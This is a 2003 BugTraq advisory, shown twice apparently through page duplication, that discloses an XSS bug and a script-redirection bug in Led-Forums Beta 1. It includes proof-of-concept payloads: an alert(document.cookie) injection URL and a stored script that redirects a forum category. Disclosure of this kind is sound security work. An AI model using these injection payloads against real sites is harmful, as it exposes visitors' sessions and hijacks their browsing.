BugTraq
Back to list
|
Post reply
Multiple Vulnerabilities in Led-Forums
Oct 30 2003 04:04PM
ProXy - (proxy excluded org)
Product: Led-Forums
Versions: Beta 1
Vulnerability: XSS- and redirection-Bug
Date: October 30, 2003
Discovered by: ProXy <proxy (at) excluded (dot) org [email concealed]>
1. - XSS-Bug
The Welcome-Message of the Led-Forums software could be changed by everybody.
Normal Text, HTML and Javascript it's all allowed! :)
eg:
http://host/~path/index.php?top_message=<script>alert(document.coo
kie)</script>
http://host/~path/index.php?top_message=<h1>OWNED?%20*g*</h1>
--
2. - Redirection-Bug
HTML-tags are allowed in topic-names as well as Javascript.
So if anybody insert the following JS-code in the topic-field of a new thread
the complete forum-category would be redirected to the adress the attacker indicates.
<script>window.location='http://www.excluded.org'</script>
- ProXy
- http://www.excluded.org
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Product: Led-Forums
Versions: Beta 1
Vulnerability: XSS- and redirection-Bug
Date: October 30, 2003
Discovered by: ProXy <proxy (at) excluded (dot) org [email concealed]>
1. - XSS-Bug
The Welcome-Message of the Led-Forums software could be changed by everybody.
Normal Text, HTML and Javascript it's all allowed! :)
eg:
http://host/~path/index.php?top_message=<script>alert(document.coo
kie)</script>
http://host/~path/index.php?top_message=<h1>OWNED?%20*g*</h1>
--
2. - Redirection-Bug
HTML-tags are allowed in topic-names as well as Javascript.
So if anybody insert the following JS-code in the topic-field of a new thread
the complete forum-category would be redirected to the adress the attacker indicates.
<script>window.location='http://www.excluded.org'</script>
- ProXy
- http://www.excluded.org
[ reply ]